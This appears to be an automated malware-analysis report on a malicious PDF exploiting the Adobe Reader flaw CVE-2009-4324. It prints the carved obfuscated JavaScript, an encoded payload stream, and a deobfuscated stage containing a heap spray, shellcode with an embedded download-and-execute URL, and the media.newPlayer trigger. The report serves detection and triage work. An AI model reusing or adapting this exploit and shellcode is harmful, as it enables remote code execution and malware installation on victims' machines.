MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF sample contains embedded JavaScript that exploits CVE-2009-4324 to download a payload from the URL http://xcpz.in/x/p.php?e=8&&. The JavaScript is heavily obfuscated but appears to be designed to fetch and execute a secondary stage. The ML classifier also strongly indicated maliciousness.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 6
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://xcpz.in/x/p.php?e=8&& Referenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0008_000.jsc164107fe12313c105e1a33de8755f1649320e21d29b05e9694f38ad88113e27 |
pdf-javascript-stream | PDF /JS object 8 at offset 0x1E7 | 2553 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var ppp = ""+"%";
var ppp2 = ""+"a";
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/ ""+ /*iii9d99999999iii*/ app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/ );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/ ""+ /*iii9d99999999iii*/ ppp /*iii9d99999999iii*/ );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/ ""+ /*iii9d99999999iii*/ ppp2 /*iii9d99999999iii*/);
}
var /*iii9d99999999iii*/gDorKLJmdL77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/
var nFAlxOIQfQ89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/
var /*iii9d99999999iii*/gDorKLJmdL77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
var bssfAgFjjK1 = nFAlxOIQfQ89[1];
/*iii9d99999999iii*/
var JZIWqLCFzv3 = nFAlxOIQfQ89[2];
/*iii9d99999999iii*/
var wOdLVDAQeN17 = gDorKLJmdL77[bssfAgFjjK1+"v"+nFAlxOIQfQ89[3]+"l"];
/*iii9d99999999iii*/
var ItaNzDWVYz18 = gDorKLJmdL77[nFAlxOIQfQ89[13]+nFAlxOIQfQ89[14]+bssfAgFjjK1+"s"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+nFAlxOIQfQ89[15]+bssfAgFjjK1];
/*iii9d99999999iii*/
wOdLVDAQeN17("v"+nFAlxOIQfQ89[3]+"r PMEFdJVUct15 = /hic/"+nFAlxOIQfQ89[9]+nFAlxOIQfQ89[10]+";");
/*iii9d99999999iii*/
var pwPzsjOccq10 = gDorKLJmdL77z[/*iii9d99999999iii*/ "d"+nFAlxOIQfQ89[7-1]+nFAlxOIQfQ89[7+1]];
/*iii9d99999999iii*/
pwPzsjOccq10[nFAlxOIQfQ89[7]+"yn"+nFAlxOIQfQ89[8]+"A"+nFAlxOIQfQ89[14]+nFAlxOIQfQ89[14]+"o"+nFAlxOIQfQ89[11]+"S"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+"n"]();
/*iii9d99999999iii*/
var AbntGnZMXI4 = pwPzsjOccq10[nFAlxOIQfQ89[10]+bssfAgFjjK1+"tAnn"+nFAlxOIQfQ89[6]+nFAlxOIQfQ89[11]+nFAlxOIQfQ89[7]](0);
/*iii9d99999999iii*/
var WEuAvAKhfF5 = AbntGnZMXI4[0][nFAlxOIQfQ89[7]+"ubj"+bssfAgFjjK1+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[11]];
/*iii9d99999999iii*/
var OoeWKUiNah6 = WEuAvAKhfF5/*iii9d99999999iii*/[nFAlxOIQfQ89/*iii9d99999999iii*/[11+1]+bssfAgFjjK1+/*iii9d99999999iii*/nFAlxOIQfQ89[15]+"l"/*iii9d99999999iii*/+nFAlxOIQfQ89/*iii9d99999999iii*/[3]+nFAlxOIQfQ89/*iii9d99999999iii*/[8]+bssfAgFjjK1]/*iii9d99999999iii*/(PMEFdJVUct15,JZIWqLCFzv3);
/*iii9d99999999iii*/
var IaJvUPjtbG7=ItaNzDWVYz18(ItaNzDWVYz18(OoeWKUiNah6));
wOdLVDAQeN17(IaJvUPjtbG7);
if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
|
|||
javascript_obj0008_001.jsf64581ee8b353b63416a960dbb2819bb5279e4c45ed430a33b6e1bd29ef848a3 |
pdf-javascript-stream | PDF /JS object 8 at offset 0x209 | 21251 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ppp = ""+"%";
var ppp2 = ""+"a";
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/ ""+ /*iii9d99999999iii*/ app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/ );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/ ""+ /*iii9d99999999iii*/ ppp /*iii9d99999999iii*/ );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/ ""+ /*iii9d99999999iii*/ ppp2 /*iii9d99999999iii*/);
}
var /*iii9d99999999iii*/gDorKLJmdL77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/
var nFAlxOIQfQ89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/
var /*iii9d99999999iii*/gDorKLJmdL77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
var bssfAgFjjK1 = nFAlxOIQfQ89[1];
/*iii9d99999999iii*/
var JZIWqLCFzv3 = nFAlxOIQfQ89[2];
/*iii9d99999999iii*/
var wOdLVDAQeN17 = gDorKLJmdL77[bssfAgFjjK1+"v"+nFAlxOIQfQ89[3]+"l"];
/*iii9d99999999iii*/
var ItaNzDWVYz18 = gDorKLJmdL77[nFAlxOIQfQ89[13]+nFAlxOIQfQ89[14]+bssfAgFjjK1+"s"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+nFAlxOIQfQ89[15]+bssfAgFjjK1];
/*iii9d99999999iii*/
wOdLVDAQeN17("v"+nFAlxOIQfQ89[3]+"r PMEFdJVUct15 = /hic/"+nFAlxOIQfQ89[9]+nFAlxOIQfQ89[10]+";");
/*iii9d99999999iii*/
var pwPzsjOccq10 = gDorKLJmdL77z[/*iii9d99999999iii*/ "d"+nFAlxOIQfQ89[7-1]+nFAlxOIQfQ89[7+1]];
/*iii9d99999999iii*/
pwPzsjOccq10[nFAlxOIQfQ89[7]+"yn"+nFAlxOIQfQ89[8]+"A"+nFAlxOIQfQ89[14]+nFAlxOIQfQ89[14]+"o"+nFAlxOIQfQ89[11]+"S"+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[3]+"n"]();
/*iii9d99999999iii*/
var AbntGnZMXI4 = pwPzsjOccq10[nFAlxOIQfQ89[10]+bssfAgFjjK1+"tAnn"+nFAlxOIQfQ89[6]+nFAlxOIQfQ89[11]+nFAlxOIQfQ89[7]](0);
/*iii9d99999999iii*/
var WEuAvAKhfF5 = AbntGnZMXI4[0][nFAlxOIQfQ89[7]+"ubj"+bssfAgFjjK1+nFAlxOIQfQ89[8]+nFAlxOIQfQ89[11]];
/*iii9d99999999iii*/
var OoeWKUiNah6 = WEuAvAKhfF5/*iii9d99999999iii*/[nFAlxOIQfQ89/*iii9d99999999iii*/[11+1]+bssfAgFjjK1+/*iii9d99999999iii*/nFAlxOIQfQ89[15]+"l"/*iii9d99999999iii*/+nFAlxOIQfQ89/*iii9d99999999iii*/[3]+nFAlxOIQfQ89/*iii9d99999999iii*/[8]+bssfAgFjjK1]/*iii9d99999999iii*/(PMEFdJVUct15,JZIWqLCFzv3);
/*iii9d99999999iii*/
var IaJvUPjtbG7=ItaNzDWVYz18(ItaNzDWVYz18(OoeWKUiNah6));
wOdLVDAQeN17(IaJvUPjtbG7);
if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 18390
>>
stream
hic25hic30hic41hic25hic37hic36hic25hic36hic31hic25hic37hic32hic25hic32hic30hic25hic36hic31hic25hic35hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic36hic39hic25hic36hic45hic25hic37hic33hic25hic32hic30hic25hic33hic44hic25hic32hic30hic25hic36hic31hic25hic37hic30hic25hic37hic30hic25hic32hic45hic25hic37hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic34hic39hic25hic36hic45hic25hic37hic33hic25hic33hic42hic25hic30hic41hic25hic36hic36hic25hic36hic46hic25hic37hic32hic25hic32hic30hic25hic32hic38hic25hic37hic36hic25hic36hic31hic25hic37hic32hic25hic32hic30hic25hic36hic39hic25hic33hic44hic25hic33hic30hic25hic33hic42hic25hic32hic30hic25hic36hic39hic25hic32hic30hic25hic33hic43hic25hic32hic30hic25hic36hic31hic25hic35hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic36hic39hic25hic36hic45hic25hic37hic33hic25hic32hic45hic25hic36hic43hic25hic36hic35hic25hic36hic45hic25hic36hic37hic25hic37hic34hic25hic36hic38hic25hic33hic42hic25hic32hic30hic25hic36hic39hic25hic32hic42hic25hic32hic42hic25hic32hic39hic25hic37hic42hic25hic30hic41hic25hic36hic39hic25hic36hic36hic25hic32hic30hic25hic32hic38hic25hic36hic31hic25hic35hic30hic25hic36hic43hic25hic37hic35hic25hic36hic37hic25hic36hic39hic25hic36hic45hic25hic37hic33hic25hic35hic42hic25hic36hic39hic25hic35hic44hic25hic32hic45hic25hic36hic45hic25hic36hic31hic25hic36hic44hic25hic36hic35hic25hic33hic44hic25hic33hic44hic25hic32hic32hic25hic34hic35hic25hic35hic33hic25hic36hic33hic25hic37hic32hic25hic36hic39hic25hic37hic30hic25h
... (truncated)
|
|||
legacy_pdfkit_stage_000.jsc429c8e7ceb70398649e77a739de65b6f26a3037c3e20334718254c109ecc9bd |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0xC14 | 1226 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u782F%u7063%u2E7A%u6E69%u782F%u702F%u702E%u7068%u653F%u383D%u2626%u9000";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
|
|||
legacy_pdfkit_stage_001.js42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414 |
deobfuscated-js | cross-stage annotation API aliases at offset 0x1E7 | 81 bytes |
Preview scriptFirst 1,000 lines of the extracted script
media.newPlayer(null); /* alias values recovered from decoded annotation stage */ |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.